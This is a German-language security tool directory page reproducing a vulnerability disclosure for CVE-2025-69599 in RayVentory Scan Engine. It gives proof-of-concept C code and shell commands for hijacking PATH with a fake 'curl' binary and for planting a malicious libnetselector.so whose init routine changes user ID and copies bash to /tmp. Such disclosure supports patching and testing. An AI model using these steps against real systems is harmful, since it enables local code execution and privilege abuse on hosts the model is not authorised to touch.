Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69599 | Kitploit
Tools/GitHubGitHub/wise-security/cve-2025-69599
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinäranalyseLieferkettensicherheit
GitHubwise-security/cve-2025-69599

CVE-2025-69599

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69599

  • Autor: Rafael José Núñez Gulías
  • Unternehmen: Iberian Var Group
  • Betroffene Produkte: RayVentory Scan Engine 12.6 Update 8 und frühere Versionen
  • Raynet-Hinweis: RSEC200965

rvia in Raynet ist anfällig für ein Problem mit einem unkontrollierten Suchpfadelement. Beim Laden von Shared Objects und beim Aufruf von Systembinaries (z. B. .so-Dateien und Hilfsbinaries) werden diese über relative Pfade aufgerufen, was es einem Benutzer ermöglicht, das letztendlich ausgeführte Binary oder .so-Objekt durch Manipulation der PATH-Umgebungsvariable zu beeinflussen.

20251117223200.png

Im folgenden Nachweis wird eine beliebige Binärdatei namens curl im Verzeichnis /tmp erstellt.

root@kitploit:~
#include <stdio.h>
#include <stdlib.h>

int main() {
	system("whoami");
	return 0;
}
root@kitploit:~
gcc curl.c -o curl # Compiling the binary

Die PATH-Variable wird so geändert, dass das erste Verzeichnis, in dem nach dem Befehl curl gesucht wird, wenn er von rvia aufgerufen wird, /tmp ist.

root@kitploit:~
export PATH=/tmp:$PATH

Danach verwendet ein Aufruf von /opt/rvia/rvia getconfig unser manipuliertes curl-Binary.

20251209121335.png

Gleiches gilt für die Option upload.

20251209121709.png

Das gleiche Problem tritt bei Verwendung der Option rvia inventory auf, die im Hintergrund das Binary ndtrack aufruft. Das Binary ndtrack ruft die Befehle cat und sh über einen relativen Pfad auf.

20251117223833.png

20251224134109.png

Schließlich wurde außerdem festgestellt, dass das Binary ndtrack Shared Objects (.so files) unter Verwendung relativer Pfade einbindet.

20251118093146.png

Im folgenden Nachweis sind die Schritte zu sehen, die unternommen wurden, um den relativen Aufruf von libnetselector.so zu ersetzen (dieselben Aktionen können auch mit libuploader.so durchgeführt werden). In diesem Fall wird ein benutzerdefiniertes Shared Object erstellt. Wenn dieses Shared Object ausgeführt wird, wird eine Kopie der bash im Verzeichnis /tmp als bash_so_hijack erstellt.

Im Folgenden ist der C-Code zum Erstellen des benutzerdefinierten Shared Objects namens libnetselector.so aufgeführt.

root@kitploit:~
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

void _init() {
	setuid(1001);
	setgid(1001);
	system("cp /bin/bash /tmp/bash_so_hijack");
}
root@kitploit:~
gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # compiling the shared object

20251209131403.png

Es ist wichtig zu beachten, dass dies nur funktioniert, wenn ndtrack direkt aufgerufen wird, da bei Verwendung der Option inventory ein Bash-Skript unter /opt/rvia namens ndtrack aufgerufen wird, das die PATH-Umgebungsvariable setzt, bevor das Binary ndtrack aufgerufen wird.

20251223190146.png

Tool herunterladen